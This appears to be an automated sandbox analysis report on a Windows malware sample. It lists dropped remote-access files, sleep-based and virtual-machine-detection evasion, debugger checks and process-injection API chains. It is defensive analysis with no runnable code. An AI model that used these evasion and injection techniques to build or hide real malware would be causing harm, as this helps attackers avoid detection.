                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeWindow / User API: threadDelayed 8132Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\mscpx32r.dLLJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\msauserext.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\netmsg.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\mscat32.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\msvcp140_1.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\mscpxl32.dLLJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\neth.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\AudioCapture.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeEvaded block: after key decisiongraph_4-11135
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decisiongraph_7-119350
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decisiongraph_7-121102
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decisiongraph_7-121157
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decisiongraph_7-121507
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decisiongraph_7-124778
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decisiongraph_7-125165
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decisiongraph_7-125419
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_7-124910
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-121457
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI coverage: 5.4 %
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI coverage: 2.6 %
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD54F307_2_6CD54F30
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -35000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -34875s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -34765s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -34656s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -34547s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -34437s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -34328s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -34216s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -34094s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -33984s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -33872s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -33750s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -33640s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -33531s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -33422s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -33297s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -33187s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -33078s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -32968s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -32845s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -32719s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -32609s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -32500s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -32390s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -32281s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -32171s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -32062s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -31953s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -31843s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -31734s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -31625s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -31515s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -31406s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -31297s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -31187s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -31078s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -30968s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -30859s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -30750s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -30640s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -30531s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -30421s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -30312s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -30201s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172Thread sleep time: -30092s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD53130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CD53226h7_2_6CD53130
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040F905 FindFirstFileExW,4_2_0040F905
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D1B3
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_11069760
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_11123690
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_11108090
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,7_2_110BC0E0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE84
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_11064EF0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE4EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE4EFE1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE50F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE50F84
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE4CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,7_2_6CE4CA9B
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE50B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE50B33
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE4C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,7_2_6CE4C775
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE50702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE50702
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1102CD90 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102CD90
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,9_2_11069760
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,9_2_11123690
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11108090 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,9_2_11108090
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,9_2_110BC0E0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,9_2_11064EF0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE76C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,7_2_6CE76C74
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 35000Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 34875Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 34765Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 34656Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 34547Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 34437Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 34328Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 34216Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 34094Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 33984Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 33872Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 33750Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 33640Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 33531Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 33422Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 33297Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 33187Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 33078Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 32968Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 32845Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 32719Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 32609Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 32500Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 32390Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 32281Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 32171Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 32062Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 31953Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 31843Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 31734Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 31625Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 31515Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 31406Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 31297Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 31187Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 31078Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 30968Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 30859Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 30750Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 30640Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 30531Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 30421Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 30312Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 30201Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 30092Jump to behavior
                                Source: HTCTL32.DLL.4.drBinary or memory string: VMware
                                Source: Jjv9ha2GKn.exe, 00000000.00000002.2759945326.00000000051E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
                                Source: HTCTL32.DLL.4.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.4.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWho
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.3181897720.0000000003349000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.3182026604.000000000335E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.2887216359.0000000003349000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3303151526.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3303309290.000000000337D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.2887050426.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3301652835.000000000047E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.3181897720.00000000032EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.4.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: HTCTL32.DLL.4.drBinary or memory string: VMWare
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001063000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\'
                                Source: client32.exe, 00000009.00000003.2889076833.00000000004FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                                Source: Jjv9ha2GKn.exe, 00000000.00000002.2759945326.00000000051E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_4-11183
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI call chain: ExitProcess graph end nodegraph_7-119575
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI call chain: ExitProcess graph end nodegraph_7-119073
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00407884 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00407884
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110CF9F0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,7_2_110CF9F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE76C74 VirtualProtect ?,-00000001,00000104,?7_2_6CE76C74
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029200
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00401000 lstrcmpA,GetProcessHeap,HeapAlloc,lstrlenA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,4_2_00401000
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00407884 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00407884
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040D978 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040D978
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00407A11 SetUnhandledExceptionFilter,4_2_00407A11
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00406F73 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00406F73
